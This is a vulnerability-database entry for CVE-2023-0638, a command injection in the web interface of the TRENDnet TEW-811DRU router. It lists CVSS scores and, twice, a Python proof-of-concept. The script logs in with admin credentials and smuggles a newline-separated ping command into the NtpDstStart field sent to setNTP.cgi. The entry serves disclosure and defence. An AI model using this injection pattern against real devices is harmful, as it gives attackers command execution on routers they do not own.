Campo | 02/02/2023 09h09 | 02/02/2023 09h10 | 01/03/2023 16h39 |
---|
vendor | TRENDnet | TRENDnet | TRENDnet |
name | TEW-811DRU | TEW-811DRU | TEW-811DRU |
version | 1.0.10.0 | 1.0.10.0 | 1.0.10.0 |
component | Web Interface | Web Interface | Web Interface |
cwe | 77 (direitos alargados) | 77 (direitos alargados) | 77 (direitos alargados) |
risk | 2 | 2 | 2 |
cvss3_vuldb_av | N | N | N |
cvss3_vuldb_ac | L | L | L |
cvss3_vuldb_pr | H | H | H |
cvss3_vuldb_ui | N | N | N |
cvss3_vuldb_s | U | U | U |
cvss3_vuldb_c | H | H | H |
cvss3_vuldb_i | H | H | H |
cvss3_vuldb_a | H | H | H |
cvss3_vuldb_e | P | P | P |
cvss3_vuldb_rc | R | R | R |
availability | 1 | 1 | 1 |
publicity | 1 | 1 | 1 |
cve | CVE-2023-0638 | CVE-2023-0638 | CVE-2023-0638 |
responsible | VulDB | VulDB | VulDB |
date | 1675292400 (02/02/2023) | 1675292400 (02/02/2023) | 1675292400 (02/02/2023) |
cvss2_vuldb_av | N | N | N |
cvss2_vuldb_ac | L | L | L |
cvss2_vuldb_au | M | M | M |
cvss2_vuldb_ci | C | C | C |
cvss2_vuldb_ii | C | C | C |
cvss2_vuldb_ai | C | C | C |
cvss2_vuldb_e | POC | POC | POC |
cvss2_vuldb_rc | UR | UR | UR |
cvss2_vuldb_rl | ND | ND | ND |
cvss3_vuldb_rl | X | X | X |
cvss2_vuldb_basescore | 8.3 | 8.3 | 8.3 |
cvss2_vuldb_tempscore | 7.1 | 7.1 | 7.1 |
cvss3_vuldb_basescore | 7.2 | 7.2 | 7.2 |
cvss3_vuldb_tempscore | 6.5 | 6.5 | 6.5 |
cvss3_meta_basescore | 7.2 | 7.2 | 7.2 |
cvss3_meta_tempscore | 6.5 | 6.5 | 6.5 |
price_0day | $0-$5k | $0-$5k | $0-$5k |
language | | Python | Python |
sourcecode | | import requests,socket
import re
import time
from urllib.parse import urlencode
# NOTE(review): this listing lost its indentation inside the table cell, so the
# nesting of the loop/try bodies below cannot be recovered with certainty.
# Credentials and addresses are hard-coded private-range (192.168.10.x) values.
# Every request below is sent with these admin credentials, which is consistent
# with the PR:H rating in the CVSS vector of this entry.
username = 'admin'
password = 'ZYWN7T47'
device_web_ip = '192.168.10.1'
# Host named in the ping command that is embedded in NtpDstStart below.
ping_target_ip = '192.168.10.102'
# Request template: 'HEAD' holds the HTTP headers, 'PARAM' the form fields and
# 'ATTR' the URL/method/version of the POST to setNTP.cgi.
request = {'HEAD':
{'Host': '{}'.format(device_web_ip),
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': '555',
'Origin': 'http://0.0.0.0:8081',
# Disabled header: the Base64 value decodes to the same username:password pair
# defined above (HTTP Basic credentials).
#'Authorization': 'Basic YWRtaW46WllXTjdUNDc=',
'Connection': 'keep-alive',
'Referer': 'http://0.0.0.0:8081/adm/time.asp',
'Cookie': 'expandable=5c',
'Upgrade-Insecure-Requests': '1'},
# Placeholder token; replaced further down by the value scraped from
# wizard.asp when one is found.
'PARAM': {'token': 'fW092VEZZPulJJfC1WkY',
'DSTenable': 'on',
'NtpDstEnable': 1,
'NtpDstOffset': -7200,
# Security-relevant field: the value contains newline characters followed by a
# command line. Given the CWE-77 classification of this entry, this is
# presumably the parameter that reaches a shell without newline neutralisation
# (TODO confirm against the firmware). For detection, a line break (raw or
# URL-encoded) in a setNTP.cgi form field is the observable to look for.
'NtpDstStart': 'abcd\nping -c 1 {}\n'.format(ping_target_ip),
# NOTE(review): several of the remaining fields carry non-numeric or very large
# values ('abcd', 384968387, the 'range.func' path string); they look like
# fuzzer-generated input rather than something the issue depends on - confirm.
'tz_daylight_start_day_select': 1,
'tz_daylight_start_time_select': 2,
'NtpDstEnd': 100102,
'tz_daylight_end_month_select': 384968387,
'tz_daylight_end_day_select': 1,
'tz_daylight_end_time_select': 2,
'enableNTP': 1,
'ntp_server': 1,
'NTPServerIP': 'pool.ntp.org',
'time_zone': 'UCT_-11',
'timer_interval': 16776915,
'manual_year_select': 2012,
'manual_month_select': 'abcd',
'manual_day_select': 'abcd',
'manual_min_select': -38,
'manual_sec_select': "abcd",
'timeTag': 'dummy',
'range.func': '/.../.../.../.../.../.../.../.../.../.../',
'DNSServerGuest': ''},
'ATTR':
{'URL': 'http://{}/setNTP.cgi'.format(device_web_ip),
'METHOD': 'POST',
'VERSION': 'HTTP/1.1'}
}
# Unpack the template into the pieces handed to requests.
headers = request['HEAD']
params = request['PARAM']
method = request['ATTR']['METHOD']
url = request['ATTR']['URL']
# Headers used only for the login request.
login_header = {'Host': '0.0.0.0:8081',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive',
'Referer': 'http://0.0.0.0:8081/login.asp',
'Cookie': 'expandable=4c'}
login = 'http://{}/login.cgi?langSelection=EN'.format(device_web_ip)
probe = 'http://{}/wizard/wizard.asp'.format(device_web_ip)
# At most three attempts to log in and obtain a fresh form token.
loop = 3
r = None
while loop>0:
try:
loop -= 1
# auth=(username, password) makes requests send HTTP Basic credentials; the
# URLs are plain http, so they are not protected in transit.
r = requests.get(url=login,headers=login_header,auth=(username,password),timeout=5)
if r.status_code != 200:
continue
# Fetch an authenticated page and read the hidden "token" form value from it;
# the first match replaces the placeholder in params.
r = requests.get(url=probe,headers=headers,auth=(username,password),timeout=5)
pat = r'name="token" value="(.*?)"'
token_value = re.findall(pat,r.text)
if len(token_value)>0:
params['token'] = token_value[0]
print('new_token:{}'.format(token_value[0]))
break
except Exception as e:
# The delay is computed from the remaining attempt count, so it grows with
# each failed attempt.
time.sleep((3-loop)*3)
print('error:{}'.format(e))
# Send the form to setNTP.cgi. verify=False only concerns HTTPS certificate
# checks and the URL here is http://. The bare except discards every error, so
# the script prints nothing about the outcome of this request.
try:
r = requests.request(method=method,url=url,headers=headers,auth=(username,password),data=urlencode(params),verify=False,timeout=5)
except:
pass | import requests,socket
import re
import time
from urllib.parse import urlencode
# NOTE(review): this listing lost its indentation inside the table cell, so the
# nesting of the loop/try bodies below cannot be recovered with certainty.
# Credentials and addresses are hard-coded private-range (192.168.10.x) values.
# Every request below is sent with these admin credentials, which is consistent
# with the PR:H rating in the CVSS vector of this entry.
username = 'admin'
password = 'ZYWN7T47'
device_web_ip = '192.168.10.1'
# Host named in the ping command that is embedded in NtpDstStart below.
ping_target_ip = '192.168.10.102'
# Request template: 'HEAD' holds the HTTP headers, 'PARAM' the form fields and
# 'ATTR' the URL/method/version of the POST to setNTP.cgi.
request = {'HEAD':
{'Host': '{}'.format(device_web_ip),
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': '555',
'Origin': 'http://0.0.0.0:8081',
# Disabled header: the Base64 value decodes to the same username:password pair
# defined above (HTTP Basic credentials).
#'Authorization': 'Basic YWRtaW46WllXTjdUNDc=',
'Connection': 'keep-alive',
'Referer': 'http://0.0.0.0:8081/adm/time.asp',
'Cookie': 'expandable=5c',
'Upgrade-Insecure-Requests': '1'},
# Placeholder token; replaced further down by the value scraped from
# wizard.asp when one is found.
'PARAM': {'token': 'fW092VEZZPulJJfC1WkY',
'DSTenable': 'on',
'NtpDstEnable': 1,
'NtpDstOffset': -7200,
# Security-relevant field: the value contains newline characters followed by a
# command line. Given the CWE-77 classification of this entry, this is
# presumably the parameter that reaches a shell without newline neutralisation
# (TODO confirm against the firmware). For detection, a line break (raw or
# URL-encoded) in a setNTP.cgi form field is the observable to look for.
'NtpDstStart': 'abcd\nping -c 1 {}\n'.format(ping_target_ip),
# NOTE(review): several of the remaining fields carry non-numeric or very large
# values ('abcd', 384968387, the 'range.func' path string); they look like
# fuzzer-generated input rather than something the issue depends on - confirm.
'tz_daylight_start_day_select': 1,
'tz_daylight_start_time_select': 2,
'NtpDstEnd': 100102,
'tz_daylight_end_month_select': 384968387,
'tz_daylight_end_day_select': 1,
'tz_daylight_end_time_select': 2,
'enableNTP': 1,
'ntp_server': 1,
'NTPServerIP': 'pool.ntp.org',
'time_zone': 'UCT_-11',
'timer_interval': 16776915,
'manual_year_select': 2012,
'manual_month_select': 'abcd',
'manual_day_select': 'abcd',
'manual_min_select': -38,
'manual_sec_select': "abcd",
'timeTag': 'dummy',
'range.func': '/.../.../.../.../.../.../.../.../.../.../',
'DNSServerGuest': ''},
'ATTR':
{'URL': 'http://{}/setNTP.cgi'.format(device_web_ip),
'METHOD': 'POST',
'VERSION': 'HTTP/1.1'}
}
# Unpack the template into the pieces handed to requests.
headers = request['HEAD']
params = request['PARAM']
method = request['ATTR']['METHOD']
url = request['ATTR']['URL']
# Headers used only for the login request.
login_header = {'Host': '0.0.0.0:8081',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive',
'Referer': 'http://0.0.0.0:8081/login.asp',
'Cookie': 'expandable=4c'}
login = 'http://{}/login.cgi?langSelection=EN'.format(device_web_ip)
probe = 'http://{}/wizard/wizard.asp'.format(device_web_ip)
# At most three attempts to log in and obtain a fresh form token.
loop = 3
r = None
while loop>0:
try:
loop -= 1
# auth=(username, password) makes requests send HTTP Basic credentials; the
# URLs are plain http, so they are not protected in transit.
r = requests.get(url=login,headers=login_header,auth=(username,password),timeout=5)
if r.status_code != 200:
continue
# Fetch an authenticated page and read the hidden "token" form value from it;
# the first match replaces the placeholder in params.
r = requests.get(url=probe,headers=headers,auth=(username,password),timeout=5)
pat = r'name="token" value="(.*?)"'
token_value = re.findall(pat,r.text)
if len(token_value)>0:
params['token'] = token_value[0]
print('new_token:{}'.format(token_value[0]))
break
except Exception as e:
# The delay is computed from the remaining attempt count, so it grows with
# each failed attempt.
time.sleep((3-loop)*3)
print('error:{}'.format(e))
# Send the form to setNTP.cgi. verify=False only concerns HTTPS certificate
# checks and the URL here is http://. The bare except discards every error, so
# the script prints nothing about the outcome of this request.
try:
r = requests.request(method=method,url=url,headers=headers,auth=(username,password),data=urlencode(params),verify=False,timeout=5)
except:
pass |
cve_assigned | | | 1675292400 (02/02/2023) |
cve_nvd_summary | | | A vulnerability has been found in TRENDnet TEW-811DRU 1.0.10.0 and classified as critical. This vulnerability affects unknown code of the component Web Interface. The manipulation leads to command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-220018 is the identifier assigned to this vulnerability. |